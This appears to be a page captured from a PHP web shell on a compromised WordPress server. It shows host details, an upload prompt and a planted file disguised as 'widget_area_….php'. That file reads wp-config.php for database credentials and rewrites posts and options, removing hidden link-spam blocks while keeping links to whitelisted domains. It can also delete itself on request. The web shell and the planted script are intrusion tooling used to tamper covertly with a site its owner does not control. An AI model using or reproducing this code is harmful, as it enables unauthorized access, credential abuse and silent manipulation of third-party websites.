HEX
Server: Apache
System: Linux p3plzcpnl457797.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: xrp54be6gdhh (7647548)
PHP: 7.3.33
Disabled: NONE
$ pwd: /home/xrp54be6gdhh/public_html/alexanderkhoubian.com/wp-content/
Upload Files
File: /home/xrp54be6gdhh/public_html/alexanderkhoubian.com/wp-content/widget_area_1753260166.php
<!--YPoZI0i5-->
<?php
/**
 * Simple spam cleanup script
 * Runs automatically when uploaded to server
 */

// Whitelist domains (domains that should NOT be removed)
$whitelist_domains = [
    'floodlight.co.uk',
    'cicassociation.org.uk',
    // Add your trusted domains
];

// Find wp-config.php
$wp_config = null;
$dir = __DIR__;
for ($i = 0; $i < 5; $i++) {
    if (file_exists($dir . '/wp-config.php')) {
        $wp_config = $dir . '/wp-config.php';
        break;
    }
    $dir = dirname($dir);
}

if (!$wp_config) {
    die('wp-config.php not found');
}

include $wp_config;

function extractDomain($url) {
    $parsed = parse_url($url);
    return isset($parsed['host']) ? $parsed['host'] : '';
}

function isWhitelisted($content, $whitelist_domains) {
    preg_match_all('/<a[^>]+href=["\']([^"\']+)["\']/', $content, $matches);
    if (!empty($matches[1])) {
        foreach ($matches[1] as $url) {
            $domain = extractDomain($url);
            if ($domain && in_array($domain, $whitelist_domains)) {
                return true;
            }
        }
    }
    return false;
}

try {
    $pdo = new PDO("mysql:host=" . DB_HOST . ";dbname=" . DB_NAME, DB_USER, DB_PASSWORD);
    $table_prefix = isset($table_prefix) ? $table_prefix : 'wp_';
    
    // Search for spam in posts
    $sql = "SELECT ID, post_content FROM {$table_prefix}posts 
            WHERE post_content LIKE '%position: absolute; left: -%'";
    
    $stmt = $pdo->query($sql);
    $cleaned = 0;
    
    while ($post = $stmt->fetch()) {
        $content = $post['post_content'];
        $pattern = '/<div\s+style="[^"]*position:\s*absolute[^"]*left:\s*-\d+px[^"]*"[^>]*>.*?<\/div>/si';
        
        $content = preg_replace_callback($pattern, function($matches) use ($whitelist_domains) {
            $block = $matches[0];
            
            if (!isWhitelisted($block, $whitelist_domains)) {
                return ''; // Remove block
            }
            
            return $block; // Keep block
        }, $content);
        
        if ($content !== $post['post_content']) {
            $update = $pdo->prepare("UPDATE {$table_prefix}posts SET post_content = ? WHERE ID = ?");
            $update->execute([$content, $post['ID']]);
            $cleaned++;
        }
    }
    
    // Search for spam in options
    $sql = "SELECT option_id, option_value FROM {$table_prefix}options 
            WHERE option_value LIKE '%position: absolute; left: -%'";
    
    $stmt = $pdo->query($sql);
    
    while ($option = $stmt->fetch()) {
        $content = $option['option_value'];
        $pattern = '/<div\s+style="[^"]*position:\s*absolute[^"]*left:\s*-\d+px[^"]*"[^>]*>.*?<\/div>/si';
        
        $content = preg_replace_callback($pattern, function($matches) use ($whitelist_domains) {
            $block = $matches[0];
            
            if (!isWhitelisted($block, $whitelist_domains)) {
                return '';
            }
            
            return $block;
        }, $content);
        
        if ($content !== $option['option_value']) {
            $update = $pdo->prepare("UPDATE {$table_prefix}options SET option_value = ? WHERE option_id = ?");
            $update->execute([$content, $option['option_id']]);
            $cleaned++;
        }
    }
    
    echo "Cleaned records: $cleaned";
    
} catch (Exception $e) {
    echo "Error: " . $e->getMessage();
}

// Remove the script after execution (for security)
if (isset($_GET['cleanup']) && $_GET['cleanup'] === 'auto') {
    unlink(__FILE__);
}
?>
@ Telegram